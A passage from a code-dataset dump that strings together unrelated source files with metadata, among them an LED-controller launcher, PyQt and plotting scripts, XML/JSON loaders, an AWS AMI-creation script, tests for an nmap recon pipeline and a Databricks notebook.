self._config_lock,\n self._notification_queue_device_manager_in,\n self._notification_queue_device_manager_out,\n self._notification_queue_audio_in,\n self._notification_queue_audio_out,\n self._notification_queue_webserver_in,\n self._notification_queue_webserver_out,\n ))\n self._notification_service_process.start()\n\n # Start Webserver\n self._webserver = Webserver()\n self._webserver_process = Process(\n target=self._webserver.start,\n args=(\n self._config_lock,\n self._notification_queue_webserver_in,\n self._notification_queue_webserver_out,\n self._effects_queue\n ))\n self._webserver_process.start()\n\n # Start audio process\n self._audio = AudioProcessService()\n self._audio_process = Process(\n target=self._audio.start,\n args=(\n self._config_lock,\n self._notification_queue_audio_in,\n self._notification_queue_audio_out,\n self._audio_queue\n ))\n self._audio_process.start()\n\n self.logger.info(\"Initialization finished.\")\n\n try:\n self.logger.info(\"MLSC started...\")\n\n self._cancel_token = False\n\n # Do nothing with this thread. Just wait for the exit.\n while not self._cancel_token:\n sleep(10)\n\n except KeyboardInterrupt:\n self.logger.info(\"Stopping MLSC...\")\n self._notification_service_process.terminate()\n self._webserver_process.terminate()\n self.logger.info(\"MLSC stopped\")\n\n\nif __name__ == \"__main__\":\n\n # logging.basicConfig(handlers=[\n # RotatingFileHandler(logging_path + logging_file, mode='a', maxBytes=5 * 1024 * 1024, backupCount=5, encoding='utf-8'),\n # logging.StreamHandler()\n # ],\n # format='%(asctime)s - %(levelname)-8s - %(name)-15s - %(message)s',\n # datefmt='%Y.%m.%d %H:%M:%S',\n # level=logging.DEBUG\n # )\n\n main = Main()\n main.start()\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"24980836","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import uic\nfrom Cython.Compiler.Naming import self_cname\nimport string\n\nform_class = uic.loadUiType(\"myqt05.ui\")[0]\n\nclass MyWindow(QMainWindow, form_class):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pb.clicked.connect(self.myclick)\n \n def myclick(self):\n hello = \"\\nhello\"\n # obj = QTextEdit(self.te())\n # obj.text\n # TextEdit는 toplainText를 받으면서 감.\n hello1 = self.te.toPlainText()\n \n self.te.setText(hello1 + hello)\n \nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n myWindow = MyWindow()\n myWindow.show()\n app.exec_()","sub_path":"HELLOPYTHON/day04/myqt05.py","file_name":"myqt05.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"278215683","text":"import os\nimport argparse\nimport pickle\n\nimport numpy as np\n\nfrom motornn.utils.predict_utils import (load_model, load_data,\n predict, compute_metrics,\n generate)\n\n\ndef get_arg_parse():\n parser = argparse.ArgumentParser(description='Test on custom benchmark.')\n parser.add_argument('--speed_model_file', required=True, type=str)\n parser.add_argument('--torque_model_file', required=True, type=str)\n parser.add_argument('--window', type=int,\n required=True, help='input window')\n parser.add_argument('--save_file', type=str, required=True,\n help='output filepath')\n args = parser.parse_args()\n return args\n\n\nargs = get_arg_parse()\nspeed_model, torque_model = load_model(args)\n\nramp_overshoot = []\n\nfor ramp in np.arange(0.004, 2.5, 0.004):\n try:\n reference_speed = [0, 0, 50, 50]\n speed_time = [0, 1, 1+ramp, 5]\n reference_torque = [0, 0, 0, 0]\n torque_time = [0, 1, 1+ramp, 5]\n sim_rate = 0.004\n data = generate(reference_speed, speed_time,\n reference_torque, torque_time,\n sim_rate)\n\n speed_denormed, torque_denormed, speed_ml_metrics, torque_ml_metrics = \\\n predict(speed_model, torque_model, data, args.window)\n\n # print('Speed ML Metrics', speed_ml_metrics)\n # print('Torque ML Metrics', torque_ml_metrics)\n ee_metrics = compute_metrics(data, speed_denormed, torque_denormed, 'speed')\n\n # print('Quantity', 'Simulation', 'Model')\n # print('2% time', ee_metrics['perc2_times'][0],\n # ee_metrics['model_perc2_times'][0])\n # print('95% time', ee_metrics['perc95_times'][0],\n # ee_metrics['model_perc95_times'][0])\n # print('Overshoot', ee_metrics['overshoot_errs'][0],\n # ee_metrics['model_overshoot_errs'][0])\n # print('Following Error', ee_metrics['following_errs'][0],\n # ee_metrics['model_following_errs'][0])\n # print('Steady State Error', ee_metrics['sse_errs'][0],\n # ee_metrics['model_sse_errs'][0])\n # print('Max Acc Torque', ee_metrics['max_trq_accs'][0],\n # ee_metrics['model_max_trq_accs'][0])\n\n ramp_overshoot.append([ramp, ee_metrics, speed_ml_metrics, torque_ml_metrics])\n\n print(ramp, ee_metrics['overshoot_errs'][0],\n ee_metrics['model_overshoot_errs'][0])\n\n # if not os.path.exists(args.save_dir):\n # os.makedirs(args.save_dir)\n #\n # fout = open(os.path.join(args.save_dir,\n # args.speed_model_file.split('/')[-1].replace('.pt',\n # str(ramp) + '.pkl')), 'wb')\n # pickle.dump([speed_denormed, torque_denormed], fout)\n # fout.close()\n except:\n pass\n\nfout = open(args.save_file, 'wb')\npickle.dump(ramp_overshoot, fout)\nfout.close()\n","sub_path":"motornn/predict_batch.py","file_name":"predict_batch.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"358852780","text":"import json\nimport xml.dom.minidom\nfrom model import Author\n\n\nclass json_loader(object):\n\n @staticmethod\n def parse_loaded_dict(loaded_dict):\n return Author(name=loaded_dict['name'],\n country=loaded_dict['country'],\n years='-'.join(map(str, loaded_dict['years']))\n if len(loaded_dict['years']) > 1\n else ''.join(loaded_dict['years']))\n\n @staticmethod\n def load(string):\n loaded = json.loads(string)\n if isinstance(loaded, list):\n return [json_loader.parse_loaded_dict(item) for item in loaded]\n else:\n return [json_loader.parse_loaded_dict(loaded)]\n\n @staticmethod\n def dump(author):\n return json.dumps({'name': author.name,\n 'country': author.country,\n 'years': author.years.split('-')})\n\n\nclass xml_loader(object):\n\n @staticmethod\n def load(string):\n parsed = xml.dom.minidom.parseString(string)\n author = parsed.getElementsByTagName('author')[0]\n name = author.getElementsByTagName('name')[0].firstChild.data\n country = author.getElementsByTagName('country')[0].firstChild.data\n years = author.getElementsByTagName('years')[0]\n return [Author(name=name,\n country=country,\n years='-'.join((years.attributes['born'].value,\n years.attributes['died'].value)))]\n\n @staticmethod\n def dump(author):\n try:\n document = xml.dom.minidom.Document()\n dom_author = document.createElement('author')\n dom_name = document.createElement('name')\n dom_name.appendChild(document.createTextNode(author.name))\n dom_author.appendChild(dom_name)\n dom_country = document.createElement('country')\n dom_country.data = author.country\n dom_country.appendChild(document.createTextNode(author.country))\n dom_author.appendChild(dom_country)\n dom_years = document.createElement('years')\n years = author.years.split('-')\n if len(years) < 2:\n years.append('')\n (dom_years.attributes['born'],\n dom_years.attributes['died']) = years\n dom_author.appendChild(dom_years)\n document.appendChild(dom_author)\n return document.toprettyxml()\n except BaseException as e:\n print(e)\n raise\n","sub_path":"Laba4/3/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"69543681","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\nimport datetime\nimport pytz\nfrom sqlalchemy import create_engine, MetaData, Table\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nimport re\nimport requests\nfrom requests.exceptions import HTTPError\n\n# class RateScraper():\n#\n# def get_html(self):\n#\n# chrome_options = webdriver.ChromeOptions()\n# chrome_options.add_argument('--no-sandbox')\n# chrome_options.add_argument('--headless')\n# chrome_options.add_argument('--disable-gpu')\n# driver = webdriver.Chrome(chrome_options=chrome_options)\n# driver.get(settings.STOCK_URL)\n# time.sleep(5)\n# html = driver.page_source\n# driver.close()\n# return html\n#\n# def scrape_rates(self):\n# data = {}\n# data['date'] = datetime.datetime.utcnow().replace(tzinfo=pytz.utc)\n# html = self.get_html()\n# soup = BeautifulSoup(html, 'html.parser')\n# div_main = soup.find('div', 'containerCenter')\n# tbody = div_main.find('tbody')\n# rows = tbody.find_all('tr')\n# for row in rows:\n# tds = row.find_all('td')\n# curr_name = tds[0].find('a').text.lstrip().rstrip()\n# if re.search('/BYN_TOD3', curr_name):\n# curr_name = curr_name.replace('/BYN_TOD3','')\n# else:\n# curr_name = curr_name.replace('/BYN_TOD', '')\n# curr_rate = tds[1].text\n# data[curr_name] = curr_rate\n#\n# return data\n#\n# @classmethod\n# def put_to_db(cls, data):\n# engine = create_engine(settings.CONN_STR)\n# Base = automap_base()\n# Base.prepare(engine, reflect=True)\n# Currency = Base.classes.rates_currency\n# Rate = Base.classes.rates_rate\n# session = Session(engine)\n# date = data['date']\n# del data['date']\n# for k, v in data.items():\n# if session.query(Currency).filter(Currency.short == k).scalar():\n# currency = session.query(Currency).filter(Currency.short == k).one()\n# if re.match(r'^\\d+,\\d+', v):\n# r = v.replace(',','.')\n# try:\n# r= float(r)\n# rate = Rate(rate=float(r), currency_id=currency.id, date_time = date)\n# session.add(rate)\n# session.commit()\n# session.flush()\n# except ValueError:\n# pass\n#\n\nDAY_TYPES = {\n 'Рабочий день': 1,\n 'Выходной день': 0\n}\n\nclass CheckBYHolidays:\n\n @classmethod\n def get_calendar_page(cls, url):\n r = requests.get(url)\n if r.status_code == 200:\n return r.content\n else:\n raise HTTPError(r.status_code)\n\n @classmethod\n def is_today_workday(cls, url_to_check):\n url = url_to_check\n html = CheckBYHolidays.get_calendar_page(url)\n soup = BeautifulSoup(html, 'html.parser')\n div_content = soup.find('div','content')\n content = div_content.find(lambda tag:tag.name == \"font\" and\n len(tag.attrs) == 1 and\n tag[\"size\"] == \"+1\").text\n for k,v in DAY_TYPES.items():\n try:\n if re.search(k, content):\n return bool(v)\n except Exception as e:\n print(e)\n\n","sub_path":"rate_scraper/app/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"244986028","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ny_heatintg_all = []\r\nx_heatintg_all = []\r\ny_cooling_all = []\r\nx_cooling_all = []\r\n\r\nwith open(\"../data/heating_all.txt\", \"r\") as f:\r\n searchlines = f.readlines()\r\nfor line in searchlines:\r\n\tlist_of_data = line.split()\r\n\ty_heatintg_all.append( float(list_of_data[2]) )\r\n\tx_heatintg_all.append( int(list_of_data[0]) )\r\n\r\nwith open(\"../data/cooling_all.txt\", \"r\") as f:\r\n searchlines = f.readlines()\r\nfor line in searchlines:\r\n\tlist_of_data = line.split()\r\n\ty_cooling_all.append( float(list_of_data[2]) )\r\n\tx_cooling_all.append( int(list_of_data[0]) )\r\n\r\n\r\n\r\n \r\nplt.plot(x_heatintg_all, y_heatintg_all, label = \"Heating\", marker = \".\")\r\nplt.plot(x_cooling_all, y_cooling_all, label = \"Cooling\", marker = \"v\")\r\nplt.ylabel(\"1/U [1/V]\")\r\nplt.xlabel(\"T [°C]\")\r\nplt.legend()\r\nplt.minorticks_on()\r\n\r\nplt.savefig(\"../result/chart_1\")","sub_path":"lab_20/src/generate_chart_1.py","file_name":"generate_chart_1.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"535235777","text":"# from common.Cloudscale import *\nimport boto.ec2\nimport time\nimport sys\nfrom cloudscale.deployment_scripts.config import AWSConfig\nfrom cloudscale.deployment_scripts.scripts import check_args, get_cfg_logger\n\nclass EC2CreateAMI:\n\n def __init__(self, config, logger):\n self.config = config\n self.logger = logger\n self.conn = boto.ec2.connect_to_region(self.config.region,\n aws_access_key_id=self.config.access_key,\n aws_secret_access_key=self.config.secret_key)\n\n ami_id = self.create_ami(self.config.cfg.get('infrastructure', 'ip_address'))\n self.config.config.save('infrastructure', 'ami_id', ami_id)\n self.logger.log(\"Done\")\n\n def create_ami(self, instance_ip):\n self.logger.log(\"Creating AMI from instance %s\" % instance_ip)\n if instance_ip is None:\n self.logger.log(\"instance_ip is null\")\n exit(0)\n\n instance_id = None\n for instance in self.conn.get_only_instances():\n if instance.ip_address == instance_ip:\n instance_id = instance.id\n break\n\n if instance_id is None:\n self.logger.log(\"Can't find any instances to create ami from!\")\n exit(0)\n try:\n image_id = self.conn.create_image(instance_id, 'cloudscale-as-image')\n self.wait_available(image_id)\n self.terminate_instance(instance_id)\n return image_id\n except boto.exception.EC2ResponseError as e:\n if str(e.error_code) == 'InvalidAMIName.Duplicate':\n image = self.conn.get_all_images(filters={'name' : 'cloudscale-as-image'})[0]\n image.deregister()\n return self.create_ami(instance_ip)\n self.logger.log(\"Error creating AMI image\")\n exit(0)\n\n def terminate_instance(self, instance_id):\n self.conn.terminate_instances([instance_id])\n self.wait_terminate(instance_id)\n\n def wait_available(self, image_id):\n self.logger.log(\"Waiting to create AMI from instance ..\")\n status = self.conn.get_all_images(image_ids=[image_id])[0].state\n i=1\n while status != 'available':\n if i%10 == 0:\n self.logger.log(\"\\nPlease wait .\")\n self.logger.log(\".\", append_to_last=True)\n status = self.conn.get_all_images(image_ids=[image_id])[0].state\n time.sleep(3)\n i=i+1\n\n self.logger.log(\"Done\")\n\n def wait_terminate(self, instance_id):\n self.logger.log(\"Waiting for instance to terminate\\nPlease wait ..\")\n status = self.conn.get_all_instances([instance_id])[0].instances[0].state\n i=1\n while status != 'terminated':\n if i%10 == 0:\n self.logger.log(\"\\nPlease wait .\")\n self.logger.log(\".\", append_to_last=True)\n status = self.conn.get_all_instances([instance_id])[0].instances[0].state\n time.sleep(3)\n i=i+1\n\n self.logger.log(\"Instance is terminated!\")\n\nif __name__ == \"__main__\":\n check_args(2, \" \")\n user_path, cfg, logger = get_cfg_logger(sys.argv[1], sys.argv[2])\n EC2CreateAMI(cfg, logger)\n\n\n","sub_path":"cloudscale/deployment_scripts/scripts/infrastructure/aws/aws_create_ami.py","file_name":"aws_create_ami.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"3746180","text":"# Copyright (C) Ivan Kravets \n# See LICENSE for details.\n\nfrom platformio.platforms.base import BasePlatform\nfrom platformio.util import get_systype\n\n\nclass Linux_armPlatform(BasePlatform):\n\n \"\"\"\n Linux ARM is a Unix-like and mostly POSIX-compliant computer\n operating system (OS) assembled under the model of free and open-source\n software development and distribution.\n\n Using host OS (Mac OS X, Linux ARM) you can build native application\n for Linux ARM platform.\n\n http://platformio.org/#!/platforms/linux_arm\n \"\"\"\n\n PACKAGES = {\n\n \"toolchain-gccarmlinuxgnueabi\": {\n \"alias\": \"toolchain\",\n \"default\": True\n }\n }\n\n def __init__(self):\n if \"linux_arm\" in get_systype():\n del self.PACKAGES['toolchain-gccarmlinuxgnueabi']\n BasePlatform.__init__(self)\n","sub_path":"platformio/platforms/linux_arm.py","file_name":"linux_arm.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"526256025","text":"from pathlib import Path\nfrom recon.nmap import ThreadedNmapScan, SearchsploitScan\n\nimport luigi\n\nfrom ..utils import is_kali\n\ntfp = \"../data/bitdiscovery\"\ntf = Path(tfp).stem\nel = \"../data/blacklist\"\nrd = \"../data/recon-results\"\n\nnmap_results = Path(__file__).parent.parent / \"data\" / \"recon-results\" / \"nmap-results\"\n\n\ndef test_nmap_output_location(tmp_path):\n tns = ThreadedNmapScan(target_file=tf, exempt_list=el, results_dir=str(tmp_path), top_ports=100)\n\n assert tns.output().path == str(Path(tmp_path) / \"nmap-results\")\n\n\ndef test_searchsploit_output_location(tmp_path):\n sss = SearchsploitScan(target_file=tf, exempt_list=el, results_dir=str(tmp_path), top_ports=100)\n\n assert sss.output().path == str(Path(tmp_path) / \"searchsploit-results\")\n\n\ndef test_searchsploit_produces_results(tmp_path):\n sss = SearchsploitScan(target_file=tf, exempt_list=el, results_dir=str(tmp_path), top_ports=100)\n\n sss.input = lambda: luigi.LocalTarget(nmap_results)\n\n if not is_kali():\n return True\n\n sss.run()\n\n assert len([x for x in Path(sss.output().path).glob(\"searchsploit*.txt\")]) > 0\n","sub_path":"tests/test_recon/test_nmap.py","file_name":"test_nmap.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333393616","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n dummy = ListNode(0)\n dummy.next = head\n prev = dummy\n tail = dummy\n while n > 0:\n tail = tail.next\n n -= 1\n\n while tail.next:\n prev = prev.next\n tail = tail.next\n\n prev.next = prev.next.next\n\n return dummy.next\n\n\nhead = ListNode(1)\nprev = head\na = 4\nb = 2\nwhile a > 0:\n prev.next = ListNode(b)\n prev = prev.next\n b += 1\n a -= 1\n\ns = Solution()\nresult = s.removeNthFromEnd(head, 2)\nprint(result)\n\ns.removeNthFromEnd(ListNode(1), 1)\n","sub_path":"leetcode_python/19. 删除链表的倒数第N个节点.py","file_name":"19. 删除链表的倒数第N个节点.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"441798261","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 10 13:15:55 2016\n@author: Brian Appleton\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n\npi = np.pi\n\n#%% Problem 1 Part A\n#Plot the dielectric response of gold using eqn. (2)\n\n#Given:\nn_water = 1.33\ne_water = 1.33*1.33\nparticle_diameter = 10e-9\n#(note that I'll use 'e' in place of epsilon)\n\n#Given constants for eqn. (2)\nc1 = 12.53 #epsilon_inf\nc2 = 133e-9 #lambda_p\nc3 = 12000e-9 #lambda_gamma\n\n#Define array for wavelength. 0.1nm resolution.\n#wavelength = np.linspace(290e-9, 1010e-9, 7201)\nwavelength = np.linspace(90e-9, 1010e-9, 9201)\n\n#Calculate the complex relative dielectric constant using the given eqn. (2)\ne_r = c1 - 1/c2**2 / (1/wavelength**2 + 1j/(c3*wavelength))\n\nresonant_e_r = -2*e_water\n\n#Find the index of the element in e_r whose value matches the resonant e_r\nresonant_index = np.abs(np.real(e_r)-resonant_e_r).argmin()\nresonant_wavelength = wavelength[resonant_index]\nprint(resonant_wavelength*1e9, \"nm found at Re{e_r} = \", np.real(e_r[resonant_index]))\n\n\nplt.plot(wavelength*1e9, np.real(e_r), label=\"$\\epsilon'$\")\nplt.plot(wavelength*1e9, np.imag(e_r), label=\"$\\epsilon''$\", linestyle='--')\nplt.plot(resonant_wavelength*1e9, resonant_e_r, marker='.', markersize=10)\nax = plt.subplot(111)\nplt.suptitle(\"Dielectric response for Au\", fontsize = 18)\nplt.xlabel(\"Wavelength, nm\", fontsize=14)\nplt.ylabel(\"Relative dielectric constant\", fontsize= 14)\nplt.legend(fontsize = 20, loc = 'best')\nplt.grid(True)\nax.set_xlim(xmin=395, xmax=705)\nplt.savefig('prob1_parta.png', dpi=200)\n\n\n#%% Problem 1 Part B\n#Plot the scattering and absorption cross-sections for the 10nm diameter Au NPs. Use the result to find the resonance condition.\n\nplt.clf()\nplt.cla()\nplt.close()\n\n#Particle radius\nR = 10e-9/2\n\n#Grab the real and imaginary parts of the dielectric response for gold that we calculated in Part A\ner_re = np.real(e_r)\ner_im = np.imag(e_r)\n\n#Calculate the scattering cross-section using eqn. (17)\nsigma_sca = (8*pi/3)*((2*pi/wavelength)**4)*(R**6)*(((er_re-e_water)**2+er_im**2)/((er_re+2*e_water)**2+er_im**2))**2\npeak_sca_wavelength = wavelength[sigma_sca.argmax()]\nprint(\"The peak scattering cross-section occurs at wavelength \", peak_sca_wavelength*1e9, \" nm.\")\n\n#Calculate the absorption cross-section using eqn. (19)\nsigma_abs = (4*pi*2*pi/wavelength*R**3)*((er_im*e_water)/((er_re+2*e_water)**2+er_im**2))\npeak_abs_wavelength = wavelength[sigma_abs.argmax()]\nprint(\"The peak absorption cross-section occurs at wavelength \", peak_abs_wavelength*1e9, \" nm.\")\n\n#Calculate the extinction cross-section using eqn. (14)\nsigma_ext = sigma_sca+sigma_abs\n\n#Find the resonant wavelength, as the wavelength that maximizes sigma_ext\nresonant_index = np.argmax(sigma_ext)\nprint(\"Resonant wavelength of sigma_ext is \", wavelength[resonant_index]*1e9, \" nm. Peak height here is \", sigma_ext[resonant_index]*1e18, \" nm^2.\")\n\n#Calculate the Q factor, as the resonant wavelength divided by the FWHM\nhalf_max = sigma_ext[resonant_index]/2\nleft_half_max_index = np.abs(sigma_ext[:resonant_index]-half_max).argmin()\nright_half_max_index = np.abs(sigma_ext[resonant_index:]-half_max).argmin() + resonant_index-1\nFWHM = wavelength[right_half_max_index]-wavelength[left_half_max_index]\nQ = wavelength[resonant_index]/FWHM\nprint(\"Q = \", Q, \" with FWHM = \", FWHM*1e9, \" nm.\")\n\n#Plot the scattering cross section\nax1 = plt.subplot(311)\nplt.plot(wavelength*1e9, sigma_sca*1e18)\nplt.suptitle(\"Scattering, absorption, and extinction cross-sections for $10nm$ Au NP\", fontsize=18)\nplt.ylabel(\"Scattering cross-section, $nm^{2}$\", fontsize=12)\nax1.set_xlim(xmin=495, xmax=805)\nax1.set_ylim(ymin=0, ymax=63)\nplt.grid(True)\n\n#Plot the absorption cross section\nax2 = plt.subplot(312)\nplt.plot(wavelength*1e9, sigma_abs*1e18)\nplt.ylabel(\"Absorption cross-section, $nm^{2}$\", fontsize=12)\nax2.set_xlim(xmin=495, xmax=805)\nax2.set_ylim(ymin=0, ymax=63)\nplt.grid(True)\n\n#Plot the extinction cross section\nax3 = plt.subplot(313)\nplt.plot(wavelength*1e9, sigma_ext*1e18)\nplt.ylabel(\"Extinction cross-section, $nm^{2}$\",fontsize=12)\nax3.set_xlim(xmin=495, xmax=805)\nax3.set_ylim(ymin=0, ymax=63)\nplt.xlabel(\"Wavelength, $nm$\", fontsize=14)\nplt.grid(True)\nplt.arrow(wavelength[left_half_max_index]*1e9+5,half_max*1e18,FWHM*1e9-5,0, length_includes_head=True, shape='full', head_width=2.5, width=0.1)\nplt.arrow(wavelength[right_half_max_index]*1e9-5,half_max*1e18,-FWHM*1e9+5,0, length_includes_head=True, shape='full', head_width=2.5, width=0.1)\nplt.annotate(s=\"$\\delta\\lambda$\", xy=[wavelength[resonant_index]*1e9-3, 22])\n\nfig = plt.gcf()\nfig.set_size_inches(9,9)\nplt.savefig('prob1_partb.png', dpi=200)\n\n#%% Problem 2\n#Plot the scattering and absorption cross-sections from 300-1000nm on a semilog plot\n\nplt.clf()\nplt.cla()\nplt.close()\n\n#Tell me where the minimum is in the scattering cross-section\nindex_minimum = sigma_sca.argmin()\nwavelength_min = wavelength[index_minimum]*1e9\nprint(\"Hey! Minimum in scattering occurs at \", wavelength_min, \" nm.\")\n\n#Plot the scattering cross section\nax1 = plt.subplot(211)\nplt.semilogy(wavelength*1e9, sigma_sca*1e18)\nplt.suptitle(\"Scattering and absorption cross-sections for $10nm$ Au NP\", fontsize=18)\nplt.ylabel(\"Scattering cross-section, $nm^{2}$\", fontsize=12)\nax1.set_xlim(xmin=95, xmax=1005)\nax1.set_ylim(ymin=1e-7, ymax=1e2)\nplt.grid(True)\n\n#Plot the absorption cross section\nax2 = plt.subplot(212)\nplt.semilogy(wavelength*1e9, sigma_abs*1e18)\nplt.ylabel(\"Absorption cross-section, $nm^{2}$\", fontsize=12)\nax2.set_xlim(xmin=95, xmax=1005)\nax2.set_ylim(ymin=1e-7, ymax=1e2)\nplt.grid(True)\nplt.xlabel(\"Wavelength, $nm$\", fontsize=14)\n\nfig = plt.gcf()\nfig.set_size_inches(7,7)\nplt.savefig('prob2.png', dpi=200)\n\n#%%Problem 4\n#Plot the scattering and absorption cross-sections as a function of R^3 at the resonant wavelength\n\nplt.clf()\nplt.cla()\nplt.close()\n\n#Create an array for the cubed radius\nR_cubed = np.linspace(1e-9**3, 10e-9**3, 1001)\n\n#Grab the relative dielectric constants at the resonant wavelength\ner_re_res = er_re[resonant_index]\ner_im_res = er_im[resonant_index]\nwavelength = resonant_wavelength\n\n#Calculate the scattering cross-section using eqn. (17)\nsigma_sca = (8*pi/3)*((2*pi/wavelength)**4)*(R_cubed**2)*(((er_re_res-e_water)**2+er_im_res**2)/((er_re_res+2*e_water)**2+er_im_res**2))**2\n\n#Calculate the absorption cross-section using eqn. (19)\nsigma_abs = (4*pi*2*pi/wavelength*R_cubed**1)*((er_im_res*e_water)/((er_re_res+2*e_water)**2+er_im_res**2))\n\n#Where are the effective cross-sections equal?\neq_index = np.abs(sigma_sca-sigma_abs).argmin()\nr_cubed_eq = R_cubed[eq_index]\nprint(\"The scattering and absorption cross sections are equal when the particle diameter is \", r_cubed_eq**(1/3)*2e9, \"nm.\")\nprint(r_cubed_eq)\n\n#Plot the scattering cross section\nax1 = plt.subplot(111)\nplt.plot(R_cubed*1e27, sigma_sca*1e18, label = \"Scattering\")\nplt.plot(R_cubed*1e27, sigma_abs*1e18, label = \"Absorption\", linestyle='--')\nplt.plot([5**3, 5**3], [0, 500], linestyle = ':', color ='black', linewidth=1.5)\nplt.plot([r_cubed_eq*1e27, r_cubed_eq*1e27], [0, 500], linestyle = ':', color ='black', linewidth=1.5)\nplt.annotate(s=\"$d=10nm$\", xy=[5**3+15, 153])\nplt.annotate(s=\"$d=18nm$\", xy=[r_cubed_eq*1e27+12, 153])\nplt.suptitle(\"Scattering and absorption cross-sections for $10nm$ Au NP\", fontsize=12)\nplt.ylabel(\"Effective cross-section, $nm^{2}$\", fontsize=12)\nplt.xlabel(\"$R^{3}, nm^{3}$\", fontsize=12)\nax1.set_xlim(xmin=0, xmax=1000)\nplt.legend(fontsize = 10, loc = 'upper left') \nax1.set_ylim(ymin=0, ymax=400)\nplt.grid(True)\n\nfig = plt.gcf()\nfig.set_size_inches(5,5)\nplt.savefig('prob4.png', dpi=200)","sub_path":"HW7/problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"86376850","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC COPYRIGHT: Columbia Sportswear 2018
\n# MAGIC DESCRIPTION: Get PDM Material Family info, and create the Enterpise MaterialFamily Dimension table. In the ADW Material Family is the PK, while in PDM the Design Number is still the PK with a few footwear designs without a family. DesignNumber to MaterialFamily is a one to one. We will keep the Design Number as PK until PDM made all their changes. \n# MAGIC \n# MAGIC -----------------------------------------------------------------\n# MAGIC ###### MODIFICATION LOG\n# MAGIC | Programmmer | Change Request | Date | Change Description |\n# MAGIC |----------------------|-----------------|------------|--------------------------------------------------------------------|\n# MAGIC | Adrina Meiring | Product Star Schema | 03/23/2020 | Initial Deployment |\n# MAGIC | | | | \n\n# COMMAND ----------\n\ndbutils.widgets.text(\"schmNm\", \"\", \"\")\ndbutils.widgets.text(\"tblNm\", \"\", \"\")\n\ndbutils.widgets.text(\"deltaTS\", \"\", \"\")\ndbutils.widgets.text(\"initFlg\", \"\", \"\")\n\n\ndbutils.widgets.get(\"deltaTS\")\ndeltaTS = getArgument(\"deltaTS\")\n\ndbutils.widgets.get(\"initFlg\")\ninitFlg = getArgument(\"initFlg\")\n\ndbutils.widgets.get(\"schmNm\")\nschmNm = getArgument(\"schmNm\")\n\ndbutils.widgets.get(\"tblNm\")\ntblNm = getArgument(\"tblNm\")\n\n#Update the Timestamp to remove T\ndeltaTS = deltaTS.replace('T',' ')\n\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE DATABASE IF NOT EXISTS CSC\n# MAGIC location '/mnt/entadls/published/eim/managed/csc';\n# MAGIC CREATE TABLE if not exists CSC.DimMaterialFamily\n# MAGIC ( DesignNumber string\n# MAGIC , MaterialFamily string\n# MAGIC , EDW_CRT_TS timestamp\n# MAGIC , EDW_UPDT_TS timestamp\n# MAGIC , EDW_ACTV_FLG string \n# MAGIC , EDW_HASH_CHK string\n# MAGIC ) USING delta\n# MAGIC LOCATION '/mnt/entadls/published/eim/managed/csc/dimmaterialfamily' \n\n# COMMAND ----------\n\nif initFlg == \"X\" :\n\n truncateTable = \"TRUNCATE TABLE {0}.{1}\".format(schmNm, tblNm)\n print(truncateTable)\n spark.sql(truncateTable)\n\n# COMMAND ----------\n\n# Temp Source Delta view from all brands, for records since last run\nsqlQuery = \"\"\"CREATE OR REPLACE TEMPORARY VIEW delta_family AS \nSELECT DSGN_NM as DesignNumber\n , MTRL_FAM_NBR as MaterialFamily\n , EDW_UPDT_TS as EDW_CRT_TS\n , EDW_UPDT_TS\n , 'Y' as EDW_ACTV_FLG\n , cast('' as string) as EDW_HASH_CHK\nFROM (select DSGN_NM, MTRL_FAM_NBR, max(EDW_UPDT_TS) as EDW_UPDT_TS \n from ENTPR_PRODUCT.PDM_DSGN_SEAS\n group by DSGN_NM, MTRL_FAM_NBR\n ) as x\nWHERE x.EDW_UPDT_TS >= '{0}'\"\"\".format(deltaTS)\nspark.sql(sqlQuery) \n\n# COMMAND ----------\n\ndf = sqlContext.sql(\"SELECT DesignNumber, MaterialFamily, EDW_CRT_TS, EDW_UPDT_TS, EDW_ACTV_FLG, MD5(CONCAT(coalesce(cast(DesignNumber as string),''),coalesce(cast(MaterialFamily as String),''))) as EDW_HASH_CHK FROM delta_family\")\n\n# COMMAND 